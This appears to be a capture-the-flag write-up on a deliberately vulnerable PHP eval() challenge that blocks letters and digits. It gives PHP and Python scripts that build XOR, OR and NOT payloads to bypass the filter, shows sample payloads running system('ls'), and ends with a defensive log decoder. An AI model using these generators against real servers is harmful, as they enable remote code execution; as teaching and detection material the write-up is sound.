Contents
1. Challenge code
1. XOR
PHP part:
Python code:
2. OR
PHP code
Python code
Test result:
3. NOT
PHP script:
Test result:
1. Challenge code

```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_GET['code'];
// any letter or digit in the input is rejected
if (preg_match('/[a-z0-9]/i', $code)) {
    die('hacker');
}
eval($code);
```

Below we use the command system('ls') as the example:
1. XOR
PHP part:

```php
<?php
$myfile = fopen("xor_rce.txt", "w");
$contents = "";
for ($i = 0; $i < 256; $i++) {
    for ($j = 0; $j < 256; $j++) {
        // zero-pad to two hex digits so hex2bin() receives a whole byte
        if ($i < 16) {
            $hex_i = '0' . dechex($i);
        } else {
            $hex_i = dechex($i);
        }
        if ($j < 16) {
            $hex_j = '0' . dechex($j);
        } else {
            $hex_j = dechex($j);
        }
        $preg = '/[a-z0-9]/i'; // adjust to the regex given in the challenge
        // keep only byte pairs that the filter itself would let through
        if (!preg_match($preg, hex2bin($hex_i)) && !preg_match($preg, hex2bin($hex_j))) {
            $a = '%' . $hex_i;
            $b = '%' . $hex_j;
            $c = (urldecode($a) ^ urldecode($b));
            // record the pair when the XOR result is a printable ASCII character
            if (ord($c) >= 32 && ord($c) <= 126) {
                $contents = $contents . $c . " " . $a . " " . $b . "\n";
            }
        }
    }
}
fwrite($myfile, $contents);
fclose($myfile);
```

Running the PHP script produces a text file containing an XOR construction for every printable character.
Python code:

```python
def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        # look up each character of the wanted string in the table the PHP script wrote
        f = open("xor_rce.txt", "r")
        while True:
            t = f.readline()
            if t == "":
                break
            if t[0] == i:
                s1 += t[2:5]  # first operand, e.g. %08
                s2 += t[6:9]  # second operand, e.g. %7b
                break
        f.close()
    output = "(\"" + s1 + "\"^\"" + s2 + "\")"
    return output

while True:
    param = action(input("\n[+] your function:")) + action(input("[+] your command:")) + ";"
    print(param)
```

After running the Python script you get:
[+] your function:system
[+] your command:ls
("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%0c%08"^"%60%7b");
Copy the resulting payload into the code parameter; the final result is shown in the figure below:
2. OR
The principle is the same; only a small change to the scripts above is needed.
PHP code

```php
<?php
$myfile = fopen("or_rce.txt", "w");
$contents = "";
for ($i = 0; $i < 256; $i++) {
    for ($j = 0; $j < 256; $j++) {
        // zero-pad to two hex digits so hex2bin() receives a whole byte
        if ($i < 16) {
            $hex_i = '0' . dechex($i);
        } else {
            $hex_i = dechex($i);
        }
        if ($j < 16) {
            $hex_j = '0' . dechex($j);
        } else {
            $hex_j = dechex($j);
        }
        $preg = '/[0-9a-z]/i'; // adjust to the regex given in the challenge
        // keep only byte pairs that the filter itself would let through
        if (!preg_match($preg, hex2bin($hex_i)) && !preg_match($preg, hex2bin($hex_j))) {
            $a = '%' . $hex_i;
            $b = '%' . $hex_j;
            $c = (urldecode($a) | urldecode($b));
            // record the pair when the OR result is a printable ASCII character
            if (ord($c) >= 32 && ord($c) <= 126) {
                $contents = $contents . $c . " " . $a . " " . $b . "\n";
            }
        }
    }
}
fwrite($myfile, $contents);
fclose($myfile);
```

After running it you get:
Python code

```python
def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        # look up each character of the wanted string in the table the PHP script wrote
        f = open("or_rce.txt", "r")
        while True:
            t = f.readline()
            if t == "":
                break
            if t[0] == i:
                s1 += t[2:5]  # first operand, e.g. %13
                s2 += t[6:9]  # second operand, e.g. %60
                break
        f.close()
    output = "(\"" + s1 + "\"|\"" + s2 + "\")"
    return output

while True:
    param = action(input("\n[+] your function:")) + action(input("[+] your command:")) + ";"
    print(param)
```

Run it:
[+] your function:system
[+] your command:ls
("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%0c%13"|"%60%60");
Test result:
3. NOT
With NOT, essentially every byte used is a non-printable character, so none of them trigger the regex, and a single PHP script is enough.
PHP script:

```php
<?php
// run from the command line
fwrite(STDOUT, '[+]your function: ');
$system = str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT, '[+]your command: ');
$command = str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
// ~ complements every byte; urlencode() makes the high-bit bytes safe to paste into a URL
echo '[*] (~' . urlencode(~$system) . ')(~' . urlencode(~$command) . ');';
```

Run result:
[+]your function: system
[+]your command: ls
(~%8C%86%8C%8B%9A%92)(~%93%8C);
Test result:
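As an added example (not part of the original writeup), here is a Python decoder a defender can run over logged `code` parameter values to see what XOR, OR and NOT payloads like the three above evaluate to: it reimplements PHP's string `^`, `|` and `~` semantics and flags values that contain no plain letter or digit yet decode to alphanumeric text. It assumes the log keeps quotes and operators literal and the operand bytes percent-encoded; the sample values are the payloads produced above.

```python
import re
from urllib.parse import unquote_to_bytes

# The three payload shapes from the writeup, constructed here as sample logged values
# (operands percent-encoded, quotes and operators logged literally: an assumption).
XOR_SAMPLE = '("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%0c%08"^"%60%7b");'
OR_SAMPLE = '("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%0c%13"|"%60%60");'
NOT_SAMPLE = '(~%8C%86%8C%8B%9A%92)(~%93%8C);'

PCT = r'(?:%[0-9A-Fa-f]{2})+'  # a run of percent-encoded bytes
BINOP = re.compile(r'"(' + PCT + r')"\s*([\^|])\s*"(' + PCT + r')"')
NOTOP = re.compile(r'~(' + PCT + r')')

def php_str_xor(a: bytes, b: bytes) -> bytes:
    """PHP string ^: the result is as long as the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))

def php_str_or(a: bytes, b: bytes) -> bytes:
    """PHP string |: the shorter operand is padded with NUL bytes."""
    n = max(len(a), len(b))
    return bytes(x | y for x, y in zip(a.ljust(n, b"\0"), b.ljust(n, b"\0")))

def php_str_not(a: bytes) -> bytes:
    """PHP string ~: bitwise complement of every byte."""
    return bytes(~x & 0xFF for x in a)

def recover_strings(code_param):
    """Evaluate each ^, | or ~ string expression and return the literals it yields, in order."""
    found = []
    for m in BINOP.finditer(code_param):
        a, b = unquote_to_bytes(m.group(1)), unquote_to_bytes(m.group(3))
        found.append((m.start(), (php_str_xor if m.group(2) == "^" else php_str_or)(a, b)))
    for m in NOTOP.finditer(code_param):
        found.append((m.start(), php_str_not(unquote_to_bytes(m.group(1)))))
    return [s.decode("latin-1") for _, s in sorted(found)]

def is_filter_bypass(code_param):
    """Flag a value with no plain [a-z0-9] (the challenge's filter) that still decodes to letters or digits."""
    if re.search(r"[a-z0-9]", re.sub(PCT, "", code_param), re.I):
        return False  # plain letters present: the challenge regex would already reject it
    return any(re.search(r"[a-z0-9]", s, re.I) for s in recover_strings(code_param))

if __name__ == "__main__":
    for sample in (XOR_SAMPLE, OR_SAMPLE, NOT_SAMPLE):
        print(is_filter_bypass(sample), recover_strings(sample))
```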
OK, done!!